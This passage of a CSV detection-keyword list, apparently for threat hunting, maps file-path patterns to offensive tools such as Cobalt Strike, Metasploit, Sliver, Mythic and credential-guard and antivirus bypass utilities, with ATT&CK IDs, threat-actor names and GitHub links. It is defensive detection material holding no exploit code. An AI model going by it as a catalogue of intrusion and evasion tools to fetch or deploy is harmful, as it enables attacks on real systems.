TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*/BucketLoot.git*",".{0,1000}\/BucketLoot\.git.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*/build/encrypted_shellcode*",".{0,1000}\/build\/encrypted_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*/build/formatted_shellcode*",".{0,1000}\/build\/formatted_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*/build/shellcode*",".{0,1000}\/build\/shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","612","106","2024-01-02T20:56:41Z","2021-01-12T14:39:06Z" "*/BuildBOFs/*",".{0,1000}\/BuildBOFs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","24","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*/burp/releases/community/latest*",".{0,1000}\/burp\/releases\/community\/latest.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/burp-api/*",".{0,1000}\/burp\-api\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*/burp-Dirbuster*",".{0,1000}\/burp\-Dirbuster.{0,1000}","offensive_tool_keyword","dirbuster","Dirbuster plugin for Burp Suite","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/vulnersCom/burp-Dirbuster","1","1","N/A","N/A","1","70","28","2017-02-22T08:31:32Z","2017-02-22T08:24:05Z" "*/burpee.py*",".{0,1000}\/burpee\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","339","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" "*/BurpExtender.java*",".{0,1000}\/BurpExtender\.java.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*/burp-proxy*",".{0,1000}\/burp\-proxy.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/BurpSuite-collections*",".{0,1000}\/BurpSuite\-collections.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*/BUYTHEAPTDETECTORNOW*",".{0,1000}\/BUYTHEAPTDETECTORNOW.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/byakugan.cpp*",".{0,1000}\/byakugan\.cpp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/byakugan.dll*",".{0,1000}\/byakugan\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/bypass.vbs*",".{0,1000}\/bypass\.vbs.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/Bypass/payloads*",".{0,1000}\/Bypass\/payloads.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/bypass_mod/loader*",".{0,1000}\/bypass_mod\/loader.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","683","115","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*/BypassAV/*",".{0,1000}\/BypassAV\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","10","10","871","124","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z" "*/bypassAV-1/*",".{0,1000}\/bypassAV\-1\/.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "*/bypass-clm.exe*",".{0,1000}\/bypass\-clm\.exe.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","1","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*/bypass-clm.git*",".{0,1000}\/bypass\-clm\.git.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","1","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*/BypassCredGuard.cpp*",".{0,1000}\/BypassCredGuard\.cpp.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*/BypassCredGuard.exe*",".{0,1000}\/BypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*/BypassCredGuard.git*",".{0,1000}\/BypassCredGuard\.git.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*/BypassFramework.py*",".{0,1000}\/BypassFramework\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/bypassuac/*",".{0,1000}\/bypassuac\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/C2/Beacon/*.cs*",".{0,1000}\/C2\/Beacon\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/c2/c2.go*",".{0,1000}\/c2\/c2\.go.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*/C2/c2.go*",".{0,1000}\/C2\/c2\.go.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","485","98","2024-04-01T15:33:47Z","2021-09-15T19:06:12Z" "*/C2/Http/*.cs*",".{0,1000}\/C2\/Http\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/C2/server.py*",".{0,1000}\/C2\/server\.py.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*/C2/SmbListener.*",".{0,1000}\/C2\/SmbListener\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/c2/tcp-stager.*",".{0,1000}\/c2\/tcp\-stager\..{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/c2_code/*.html",".{0,1000}\/c2_code\/.{0,1000}\.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/c2_code/server*",".{0,1000}\/c2_code\/server.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/C2_Profiles/*",".{0,1000}\/C2_Profiles\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/C2_Server.git*",".{0,1000}\/C2_Server\.git.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*/c2_server.py*",".{0,1000}\/c2_server\.py.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","1","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*/c2_server/resources*",".{0,1000}\/c2_server\/resources.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*/c2_test.go*",".{0,1000}\/c2_test\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/C2concealer*",".{0,1000}\/C2concealer.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt 